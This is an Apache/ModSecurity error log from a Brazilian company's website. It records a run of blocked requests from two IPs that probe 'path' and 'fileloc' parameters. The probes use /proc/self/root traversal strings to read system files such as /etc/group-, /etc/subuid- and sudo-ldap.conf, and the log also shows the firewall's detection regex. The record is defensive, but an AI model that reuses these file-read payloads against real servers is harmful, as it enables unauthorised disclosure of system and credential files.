[Wed Mar 18 15:37:28.323300 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:42816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw6OyqAr6etmhZHNr9BwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:37:33.647234 2026] [:error] [pid 15826:tid 140411674785536] [client 216.73.216.191:5283] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw7OoXxyEfFpUF8f-pkwAAAUg"]
[Wed Mar 18 15:37:35.996765 2026] [:error] [pid 29882:tid 140411725141760] [client 216.73.216.191:48714] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw70zinOy1jxa1j4dQ6wAAAQI"]
[Wed Mar 18 15:37:37.681255 2026] [:error] [pid 17887:tid 140411607643904] [client 216.73.216.191:60092] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw8QkwaGbbGflqUZBGrQAAANA"]
[Wed Mar 18 15:37:39.491374 2026] [:error] [pid 17887:tid 140411649607424] [client 216.73.216.191:47841] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw8wkwaGbbGflqUZBGswAAAMs"]
[Wed Mar 18 15:37:42.090884 2026] [:error] [pid 17887:tid 140411607643904] [client 216.73.216.191:60991] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw9gkwaGbbGflqUZBGugAAANA"]
[Wed Mar 18 15:37:50.114625 2026] [:error] [pid 31803:tid 140411658000128] [client 216.73.216.191:57260] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw_uyqAr6etmhZHNr9FgAAAEo"]
[Wed Mar 18 15:37:50.341423 2026] [:error] [pid 15051:tid 140411691570944] [client 216.73.216.191:2776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrw_imAPhZkrhU8w4meggAAAIY"]
[Wed Mar 18 15:37:55.459397 2026] [:error] [pid 26799:tid 140411674785536] [client 216.73.216.191:40192] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxA9a6ubjKNq_cu4bRmwAAA0g"]
[Wed Mar 18 15:37:59.069702 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:3889] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxBta6ubjKNq_cu4bRpAAAA1A"]
[Wed Mar 18 15:38:03.147507 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:48810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxC0zinOy1jxa1j4dRGAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:38:04.311012 2026] [:error] [pid 17653:tid 140411674785536] [client 216.73.216.191:7977] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxDMdf6f5d65gmYZQJPgAAAsg"]
[Wed Mar 18 15:38:04.466535 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:50688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxDNa6ubjKNq_cu4bRqwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:38:06.826874 2026] [:error] [pid 17887:tid 140411632822016] [client 216.73.216.191:16347] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxDgkwaGbbGflqUZBG5QAAAM0"]
[Wed Mar 18 15:38:07.511650 2026] [:error] [pid 17653:tid 140411548894976] [client 216.73.216.191:23164] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxD8df6f5d65gmYZQJQQAAAtc"]
[Wed Mar 18 15:38:12.450079 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:50690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxFNa6ubjKNq_cu4bRvAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:38:18.421967 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:43128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxGuoXxyEfFpUF8f-ptwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:38:19.507565 2026] [:error] [pid 30077:tid 140411599251200] [client 216.73.216.191:23334] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxG_u8EFLIOrSqIps02wAAAlE"]
[Wed Mar 18 15:38:20.905862 2026] [:error] [pid 29882:tid 140411674785536] [client 216.73.216.191:27945] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxHEzinOy1jxa1j4dROQAAAQg"]
[Wed Mar 18 15:38:21.272891 2026] [mime_magic:error] [pid 26799:tid 140411565680384] (70014)End of file found: [client 57.141.18.120:48114] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:38:22.891935 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:36792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxHsdf6f5d65gmYZQJVgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:38:24.259767 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:36804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxIAkwaGbbGflqUZBG7gAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:38:33.098203 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:36812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxKQkwaGbbGflqUZBG_AAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:38:35.559677 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:48106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxK-yqAr6etmhZHNr9RQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:38:36.370552 2026] [:error] [pid 14269:tid 140411632822016] [client 216.73.216.191:28348] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxLAbLMZ6AikZjR9XzLgAAAA0"]
[Wed Mar 18 15:38:36.930854 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:48120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxLAkwaGbbGflqUZBG_gAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:38:36.931169 2026] [mime_magic:error] [pid 17887:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:48120] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:38:42.089968 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:49188] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
